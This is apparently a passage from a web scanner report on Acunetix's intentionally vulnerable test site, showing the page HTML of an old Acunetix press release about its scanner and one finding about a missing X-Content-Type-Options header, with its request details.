5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X/qqjYsEEZ5ETd0S8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Method	POST
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 Content-Length: 3721 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,721 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO%2FZZOlJz58
